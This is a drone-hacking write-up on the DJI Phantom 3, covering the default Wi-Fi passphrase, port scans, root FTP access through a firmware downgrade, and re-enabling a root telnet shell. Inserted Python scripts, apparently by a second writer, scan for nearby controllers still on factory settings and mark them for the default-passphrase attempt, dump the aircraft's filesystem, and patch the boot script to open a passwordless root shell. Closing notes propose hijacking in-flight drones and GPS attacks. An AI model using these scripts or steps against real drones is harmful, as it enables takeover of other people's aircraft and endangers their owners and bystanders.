Hacking the DJI Phantom 3
Finally, over Christmas, I had some spare time to play with my flying beast; I'm talking about trying to hack my DJI Phantom 3.
It was the first time I had worked with drones or similar embedded systems, and at the beginning I didn't have any clue how I could interact with it.
The Phantom 3 comes with an aircraft, a controller and an Android/iOS app.
Let’s start from the beginning:
As a first step, I analysed the protocols. The connection between the aircraft and the controller is Wi-Fi in the 5.725GHz – 5.825GHz band (and not the Lightbridge protocol, which is used for long range), while the connection between the controller and the mobile device operates at 2.400GHz-2.483GHz; here the controller acts as an AP.
Wi-Fi encryption is WPA2 and the default SSID is derived from the MAC address of the remote controller: PHANTOM3_[last 6 digits of the MAC address]. The default password is 12341234.
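Putting the SSID rule to use, here is an added example of mine (not code from the original post) that derives the factory SSID from a controller MAC and flags, in an `iw dev <iface> scan` dump, the Phantom 3 controllers still using the factory naming, since those are the ones worth trying the default passphrase against. The scan text is constructed; the assumptions that the controller AP's BSSID is the same MAC the SSID suffix is derived from, and that the suffix compares case-insensitively, are mine.

```python
import re

# From the page: factory SSID is PHANTOM3_ + last six hex digits of the remote
# controller's MAC, factory WPA2 passphrase is 12341234.
SSID_PREFIX = "PHANTOM3_"
DEFAULT_PSK = "12341234"


def default_ssid(mac):
    """Derive the factory SSID from a MAC written in any common notation."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return SSID_PREFIX + digits[-6:].upper()


def parse_iw_scan(text):
    """Pull {bssid, ssid} records out of `iw dev <iface> scan` output."""
    networks, current = [], None
    for line in text.splitlines():
        m = re.match(r"^BSS ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", line)
        if m:
            current = {"bssid": m.group(1), "ssid": ""}
            networks.append(current)
            continue
        m = re.match(r"^\s*SSID: (.*)$", line)
        if m and current is not None:
            current["ssid"] = m.group(1).strip()
    return networks


def find_phantom_aps(scan_text):
    """Return Phantom 3 controller APs, noting whether the SSID is still the factory one.

    Assumption (mine, not the page's): the AP's BSSID is the MAC the SSID suffix is
    derived from, and the suffix compares case-insensitively. A match corroborates a
    factory-configured controller, so DEFAULT_PSK is the first thing to try there.
    """
    hits = []
    for bss in parse_iw_scan(scan_text):
        if not bss["ssid"].upper().startswith(SSID_PREFIX):
            continue
        factory = bss["ssid"].upper() == default_ssid(bss["bssid"])
        hits.append({**bss, "factory_ssid": factory,
                     "try_psk": DEFAULT_PSK if factory else None})
    return hits


# Constructed scan output (not a real capture), trimmed to the lines we parse.
SAMPLE_SCAN = """\
BSS 00:11:22:aa:bb:cc(on wlan0)
\tfreq: 2437
\tSSID: PHANTOM3_AABBCC
BSS de:ad:be:ef:00:01(on wlan0)
\tSSID: HomeNet
BSS 60:60:1f:12:34:56(on wlan0)
\tSSID: PHANTOM3_renamed
"""

if __name__ == "__main__":
    import subprocess
    import sys
    if len(sys.argv) > 1:   # e.g. python3 phantom_scan.py wlan0 (needs root for iw scan)
        text = subprocess.run(["iw", "dev", sys.argv[1], "scan"],
                              capture_output=True, text=True).stdout
    else:
        text = SAMPLE_SCAN
    for hit in find_phantom_aps(text):
        print(hit)
```

A renamed SSID only tells you the owner touched the settings; the passphrase may still be the factory one, so a renamed hit is a lower-priority candidate, not an excluded one.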
Inside the network, I found these IP addresses:
- Controller: 192.168.1.1
- Aircraft: 192.168.1.2
- Camera: 192.168.1.3
- Phone (DJI GO App): 192.168.1.20
Interestingly, the camera is separate from the aircraft; I suppose that way the image feed won't interfere with aircraft navigation.
Here is the nmap result for every device:

Nmap scan report for 192.168.1.1
21/tcp   open   ftp        syn-ack      vsftpd 3.0.2
22/tcp   closed ssh        conn-refused
23/tcp   closed telnet     conn-refused
2345/tcp open   landesk-rc syn-ack      LANDesk remote management
5678/tcp closed rrac       conn-refused

Nmap scan report for 192.168.1.2
21/tcp   open     ftp        syn-ack     vsftpd 3.0.2
22/tcp   filtered ssh        no-response
23/tcp   filtered telnet     no-response
2345/tcp filtered unknown    no-response
5678/tcp open     tcpwrapped syn-ack

Nmap scan report for 192.168.1.3
21/tcp   open     ftp     syn-ack     BusyBox ftpd (D-Link DCS-932L IP-Cam camera)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| total 0
| drwxr--r-- 2 0 0 0 Dec 23 2016 DCIM
| drwxr--r-- 6 0 0 0 Dec 23 2016 MISC
|_drwxr--r-- 2 0 0 0 Dec 23 2016 System Volume Information
22/tcp   open     ssh     syn-ack     OpenSSH 6.2 (protocol 2.0)
23/tcp   open     telnet  syn-ack     BusyBox telnetd
2345/tcp filtered unknown no-response
5678/tcp filtered rrac    no-response
As you can see from the above scan, some services drew my attention:
Since I didn't have any passwords for these services, I decided to take a look at the Android app (DJI GO) and, surprisingly, I found these details while reversing it:
While the first file contains the root password for FTP access to every device inside the network, the second file contains the areas where the drone cannot fly (no-fly zones / virtual fence): airports, stadiums, military bases, cities, etc.
Unfortunately, on the latest firmware (V01.07.0090), root FTP access to the drone is chrooted and I wasn't able to escape the /tmp directory; in addition, Telnet and SSH access are disabled.
I tried to replace the firmware with a modified version, but the firmware is signed and resilient to tampering.
Downgrading the firmware to the previous version (V01.06.0080) results in unrestricted root FTP access, so I dumped the file system and started diving into it.
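As an added example (my code, not the author's), here is the kind of script I would use for the dump step: log in with the credentials recovered from the app, parse the Unix-style LIST output (the same format the nmap ftp-anon script printed for the camera), warn when the root listing looks like the /tmp chroot jail of V01.07.0090, and mirror the tree locally. The placeholder password, the chroot heuristic (a real OpenWrt root has etc and bin) and the sample listing lines beyond the three taken from the nmap output above are my assumptions.

```python
import os
import re
from ftplib import FTP

# Addresses are from the page's network map. The root FTP password recovered
# from the DJI GO app is not printed on the page: fill it in yourself.
AIRCRAFT = "192.168.1.2"
FTP_USER = "root"
FTP_PASS = "<root password from the DJI GO app>"

# Unix-style LIST line, e.g. the camera entry that nmap printed:
#   drwxr--r-- 2 0 0 0 Dec 23 2016 DCIM
LIST_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+(?P<size>\d+)\s+"
    r"(?P<date>[A-Za-z]{3}\s+\d{1,2}\s+(?:\d{4}|\d{2}:\d{2}))\s+(?P<name>.+)$"
)


def parse_list_line(line):
    """Parse one LIST line into a dict, or return None if it is not an entry."""
    m = LIST_RE.match(line.rstrip("\r\n"))
    if not m:
        return None                      # e.g. the "total 0" header
    kind = {"d": "dir", "l": "link"}.get(m.group("mode")[0], "file")
    name, target = m.group("name"), None
    if kind == "link" and " -> " in name:
        name, target = name.split(" -> ", 1)   # BusyBox prints "name -> target"
    return {"kind": kind, "name": name, "size": int(m.group("size")), "target": target}


def parse_listing(lines):
    """Parse a whole LIST response, dropping '.' and '..'."""
    entries = [e for e in map(parse_list_line, lines) if e]
    return [e for e in entries if e["name"] not in (".", "..")]


def looks_chrooted(root_entries):
    """Heuristic of mine, not the page's: a real OpenWrt root has etc and bin.
    On V01.07.0090 the root login lands in /tmp, where neither exists."""
    names = {e["name"] for e in root_entries}
    return not {"etc", "bin"} <= names


def list_dir(ftp, path):
    lines = []
    ftp.dir(path, lines.append)
    return parse_listing(lines)


def dump_tree(ftp, remote, local):
    """Recursively mirror `remote` into `local`; returns the number of files saved.
    Symlinks are recorded as small text files rather than followed (no loops)."""
    os.makedirs(local, exist_ok=True)
    saved = 0
    for e in list_dir(ftp, remote):
        rpath = remote.rstrip("/") + "/" + e["name"]
        lpath = os.path.join(local, e["name"])
        if e["kind"] == "dir":
            saved += dump_tree(ftp, rpath, lpath)
        elif e["kind"] == "file":
            with open(lpath, "wb") as fh:
                ftp.retrbinary("RETR " + rpath, fh.write)
            saved += 1
        else:
            with open(lpath + ".symlink", "w") as fh:
                fh.write(f"{rpath} -> {e['target']}\n")
    return saved


# Constructed sample: the three lines from the camera's ftp-anon output on the
# page, plus a file and a symlink line in the same BusyBox format for offline use.
SAMPLE_LISTING = """\
total 0
drwxr--r-- 2 0 0 0 Dec 23 2016 DCIM
drwxr--r-- 6 0 0 0 Dec 23 2016 MISC
drwxr--r-- 2 0 0 0 Dec 23 2016 System Volume Information
-rw-r--r-- 1 0 0 832 Jan  1 00:00 passwd
lrwxrwxrwx 1 0 0 7 Jan  1 2016 bin -> /rom/bin
"""


def main():
    ftp = FTP(AIRCRAFT, timeout=10)
    ftp.login(FTP_USER, FTP_PASS)
    root = list_dir(ftp, "/")
    if looks_chrooted(root):
        print("root listing has no etc/bin: FTP is probably chrooted, expect only the jail")
    print("saved", dump_tree(ftp, "/", "phantom3_fs"), "files")
    ftp.quit()


if __name__ == "__main__":
    main()
```

Run it against 192.168.1.1 as well to get the controller's filesystem; on the chrooted V01.07.0090 firmware the warning fires and you only get the contents of /tmp, which is exactly the limitation described above.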
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
The drone's underlying system is a fork of OpenWrt 14.07 “Barrier Breaker, r2879, 14.07” built for “ar71xx/generic”; the controller runs the same version.
Root access to the aircraft is hard to achieve because the root password is strong: I tried to crack it, but it resisted some days of cracking (thanks to the Hacktive Security guys).
So I decided to take another path: re-enabling the Telnet service. Searching inside the filesystem, I found these files:
This script runs during the boot process; enabling the code on line 61 will start the telnet server:
telnetd -l /bin/ash &
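An added example of mine (not from the post) of making the line-61 change without a shell: fetch the boot script over the unrestricted root FTP of V01.06.0080, uncomment the telnetd line, and upload it back. The page does not name the script, so the placeholder path must be replaced; I assume the line is disabled with a leading `#`, and the init script used for the offline check is constructed.

```python
import io
import re
from ftplib import FTP

AIRCRAFT = "192.168.1.2"            # the controller is 192.168.1.1 per the page
FTP_USER = "root"
FTP_PASS = "<root password from the DJI GO app>"
# The page does not name the boot script; replace this placeholder with its path.
BOOT_SCRIPT = "/etc/init.d/<boot-script-from-the-post>"

TELNET_LINE = "telnetd -l /bin/ash &"
# Assumption of mine: the line is present in the script but disabled with '#'.
COMMENTED_RE = re.compile(r"^(\s*)#\s*telnetd\s+-l\s+/bin/ash\s*&\s*$")
ACTIVE_RE = re.compile(r"^\s*telnetd\s+-l\s+/bin/ash\b")


def enable_telnetd(script):
    """Return (new_text, changed). Uncomments the first disabled telnetd line;
    a no-op when the service line is already active or not present at all."""
    lines = script.splitlines(keepends=True)
    if any(ACTIVE_RE.match(l) for l in lines):
        return script, False
    for i, line in enumerate(lines):
        body = line.rstrip("\r\n")
        m = COMMENTED_RE.match(body)
        if m:
            # keep the original indentation and line ending
            lines[i] = m.group(1) + TELNET_LINE + line[len(body):]
            return "".join(lines), True
    return script, False


def patch_over_ftp(ftp, path):
    """Download the script, keep a local backup, patch it and upload the result."""
    buf = io.BytesIO()
    ftp.retrbinary("RETR " + path, buf.write)
    original = buf.getvalue().decode("utf-8")
    with open("boot_script.orig", "w") as fh:      # untouched copy for reverting
        fh.write(original)
    patched, changed = enable_telnetd(original)
    if changed:
        ftp.storbinary("STOR " + path, io.BytesIO(patched.encode("utf-8")))
    return changed


# Constructed OpenWrt-style init script for checking the patch offline.
SAMPLE_SCRIPT = """\
#!/bin/sh /etc/rc.common
START=99
start() {
    # telnetd -l /bin/ash &
    return 0
}
"""


def main():
    ftp = FTP(AIRCRAFT, timeout=10)
    ftp.login(FTP_USER, FTP_PASS)
    print("patched" if patch_over_ftp(ftp, BOOT_SCRIPT) else "nothing to do")
    ftp.quit()


if __name__ == "__main__":
    main()
```

After a reboot of the aircraft, `telnet 192.168.1.2` should drop you into the root ash shell; the saved boot_script.orig lets you put the file back the way it was.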
In that way, I managed to get root access to the underlying system of both the aircraft and the controller:
- Check the rrac and landesk-rc services for some cool exploits
- Check the device queue, trying to de-authenticate the mobile phone and perform a takeover
- Check the SDK to hijack an in-flight drone
- GPS attack